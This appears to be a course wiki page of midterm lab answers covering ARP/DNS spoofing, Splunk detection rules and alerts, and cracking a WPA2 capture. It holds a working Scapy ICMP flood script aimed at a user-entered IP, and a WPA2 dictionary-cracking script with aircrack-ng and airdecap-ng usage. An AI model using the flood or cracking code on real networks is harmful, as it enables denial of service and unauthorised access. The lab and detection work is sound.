Midterm Revision - archie-archana/Cyberlabs GitHub Wiki
1. Use the arpspoof tool to perform the following attacks [10 Marks]
a. Use ARP packets to perform the DNS spoofing attack. Whatever website the user types, it should navigate to http://testphp.vulnweb.com/login.php as part of the attack.
b. Use ICMP packets to perform only DDoS attacks on the victim.
DNS spoof
To perform the DDoS (ICMP flood) attack on the victim:

```python
from scapy.all import IP, ICMP, send

# Function to send ICMP packets (echo requests) to the victim
def send_icmp_packet(dst_ip):
    icmp_packet = IP(dst=dst_ip) / ICMP()
    # loop=True makes send() retransmit the packet until interrupted (Ctrl-C);
    # raw-socket sending needs root privileges
    send(icmp_packet, loop=True, verbose=False)

# Main function
def main():
    target_ip = input("Enter the target IP address: ")
    while True:
        send_icmp_packet(target_ip)

if __name__ == "__main__":
    main()
```
2. Use Splunk to answer the following questions:
a. Capture these above attacks using Splunk in an active or passive method.
Passive method: the attack traffic and host logs are captured (e.g. the packet capture or forwarded syslog) and ingested into Splunk for analysis, without Splunk sending any traffic to the attacker or victim hosts.
b. Identify and Analyse the Indicator of Compromise for the attack.
An Indicator of Compromise (IoC) is any piece of evidence or anomaly that suggests a network intrusion or security breach has occurred. IoCs can take various forms, including:
- File hashes: hash values of known malicious files or executables found on systems.
- IP addresses: IP addresses associated with malicious activity, such as command and control servers or sources of malicious traffic.
- Domain names: domain names linked to malicious activities, phishing campaigns, or hosting malicious content.
- URLs: URLs used in phishing emails or websites hosting exploit kits or malware payloads.
- File paths: unusual file paths or directories commonly used by malware for persistence or data exfiltration.
- Network traffic patterns: anomalous network traffic, such as unusual spikes in DNS queries, connections to known malicious IP addresses, or unexpected outbound traffic.
- System logs: suspicious entries in system logs, including failed login attempts, privilege escalations, or unusual system activities.

For the DNS spoofing attack the IoCs come from DNS log analysis and DNS traffic analysis (queries for many different names all answered with the same unexpected IP, which is how every site ends up at the attacker's login page), the suspicious IP address of the attacker, and anomalous login activity on the redirected login page; file hashes apply if a payload was dropped. For the ICMP DDoS the IoC is the traffic pattern: a spike of ICMP echo requests to the victim from a single source.
c. Explore and create an Alert for similar attacks in the Future.
- Identify the incident the alert is for (which attack generated it).
- Select the monitoring tool (Splunk).
- Create the alerts.
- Test the alerts.
- Fine-tune the alert (thresholds, to cut false positives).
- Document the alert rules that were crafted.
- Continuous improvement.
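As an added example for 2b and 2c (this is not the page's own code and not a Splunk search), the two IoCs above are run as detection rules over constructed key=value events. The field names (`proto`, `src`, `qname`, `answer`, `type`, `ts`) are assumptions chosen to resemble Splunk's key=value extraction; the addresses are from the documentation ranges. The DNS rule flags one answer IP shared by many query names, the ICMP rule flags a source exceeding a per-second echo-request threshold, and `build_alerts` is the "create alerts" step with the thresholds exposed as the fine-tuning knobs.

```python
from collections import Counter, defaultdict

# Constructed sample events (not real Splunk data). Field names are an
# assumption chosen to resemble Splunk's key=value extraction; the IPs are
# from the RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    # Four different sites all "resolve" to one address: the DNS spoofing IoC
    "ts=1700000000.00 proto=dns src=10.0.0.5 qname=google.com answer=192.0.2.10",
    "ts=1700000000.20 proto=dns src=10.0.0.5 qname=github.com answer=192.0.2.10",
    "ts=1700000000.40 proto=dns src=10.0.0.5 qname=bbc.co.uk answer=192.0.2.10",
    "ts=1700000000.60 proto=dns src=10.0.0.5 qname=example.org answer=192.0.2.10",
    # A normal answer from an unaffected host
    "ts=1700000001.00 proto=dns src=10.0.0.7 qname=example.org answer=198.51.100.20",
    # One host sending an ordinary ping
    "ts=1700000003.50 proto=icmp src=10.0.0.7 dst=10.0.0.5 type=8",
] + [
    # 500 echo requests from one source inside one second: the ICMP flood IoC
    f"ts={1700000002 + i / 1000:.3f} proto=icmp src=10.0.0.9 dst=10.0.0.5 type=8"
    for i in range(500)
]


def parse_event(line):
    """Split a 'key=value key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def detect_dns_spoof(events, min_names=3):
    """IoC: one answer IP returned for many distinct query names.

    Returns {answer_ip: [names]} for every answer shared by >= min_names names.
    """
    names_per_answer = defaultdict(set)
    for e in events:
        if e.get("proto") == "dns":
            names_per_answer[e["answer"]].add(e["qname"])
    return {ip: sorted(n) for ip, n in names_per_answer.items() if len(n) >= min_names}


def detect_icmp_flood(events, max_per_second=100):
    """IoC: ICMP echo requests (type 8) per source in a 1-second window above threshold.

    Returns {src_ip: peak_count} for sources exceeding the threshold.
    """
    per_window = Counter()
    for e in events:
        if e.get("proto") == "icmp" and e.get("type") == "8":
            per_window[(e["src"], int(float(e["ts"])))] += 1
    peak = {}
    for (src, _), count in per_window.items():
        if count > max_per_second:
            peak[src] = max(peak.get(src, 0), count)
    return peak


def build_alerts(lines, min_names=3, max_per_second=100):
    """Run both detections and emit alert records (the 'create alerts' step).

    min_names and max_per_second are the knobs for the fine-tuning step.
    """
    events = [parse_event(line) for line in lines]
    alerts = []
    for ip, names in detect_dns_spoof(events, min_names).items():
        alerts.append({"type": "dns_spoof", "severity": "high",
                       "answer": ip, "names": names})
    for src, count in detect_icmp_flood(events, max_per_second).items():
        alerts.append({"type": "icmp_flood", "severity": "high",
                       "src": src, "peak_per_second": count})
    return alerts


if __name__ == "__main__":
    # The 'test the alerts' step: replay the sample events through the rules
    for alert in build_alerts(SAMPLE_EVENTS):
        print(alert)
```

Replaying known-bad and known-good events through the rules is the "test the alerts" step; lowering `min_names` or `max_per_second` until normal traffic starts firing, then backing off, is the fine-tuning step.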
3. Use the given PCAP file to analyse and answer the following questions:
a. Decrypt the traffic by cracking the password using appropriate tools and techniques. It is a must to mention briefly your method of cracking the password in the documentation. [HINT: password length – 16, capital letters – 2, numerals – 6; it is a repetition of the same word, as in [CyberCyber].]
Password Cracked: Cisco123Cisco123
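As an added example of the cracking method (this is not the page's own code), the hint is turned into a candidate filter, a small doubled-word wordlist is built from it, and each candidate is tried with the WPA2-PSK key derivation (PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 rounds, 32-byte PMK). The SSID `CyberLab`, the base words and the digit suffixes are assumptions; comparing against a target PMK stands in for what aircrack-ng actually does, which is derive the PTK from the PMK and check the MIC in the captured 4-way handshake.

```python
import hashlib

# Constraints from the exam hint: 16 characters, 2 capital letters, 6 numerals,
# and the password is an 8-character word repeated twice (the [CyberCyber] pattern).
def matches_hint(pw):
    return (
        len(pw) == 16
        and sum(c.isupper() for c in pw) == 2
        and sum(c.isdigit() for c in pw) == 6
        and pw[:8] == pw[8:]
    )


def wpa2_pmk(passphrase, ssid):
    """WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def build_candidates(base_words, digit_suffixes):
    """Build word+digits halves, double them, and keep only those matching the hint."""
    candidates = []
    for word in base_words:
        for digits in digit_suffixes:
            candidate = (word + digits) * 2
            if matches_hint(candidate):
                candidates.append(candidate)
    return candidates


def crack(target_pmk, ssid, candidates):
    """Dictionary attack: derive the PMK for each candidate and compare."""
    for candidate in candidates:
        if wpa2_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None


# Constructed inputs (assumptions, not taken from the exam PCAP):
SSID = "CyberLab"                                             # assumed network name
BASE_WORDS = ["cisco", "Cisco", "cyber", "Cyber", "admin"]    # tiny stand-in wordlist
DIGIT_SUFFIXES = ["123", "1234", "321", "2023"]
# Stand-in for the handshake check: in practice aircrack-ng derives the PTK
# from the PMK and verifies the MIC in the captured 4-way handshake.
TARGET_PMK = wpa2_pmk("Cisco123Cisco123", SSID)

if __name__ == "__main__":
    cands = build_candidates(BASE_WORDS, DIGIT_SUFFIXES)
    print(f"{len(cands)} candidates match the hint: {cands}")
    print("cracked:", crack(TARGET_PMK, SSID, cands))
```

In the lab the filtered candidates are written to a file and given to aircrack-ng with `-w <wordlist> <capture>` against the handshake in the PCAP; once the passphrase is known, airdecap-ng with `-e <SSID> -p <passphrase>` produces the decrypted capture used for 3b.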
b. Analyse the decrypted traffic using tools to identify the malicious/suspicious activity recorded in the WLAN.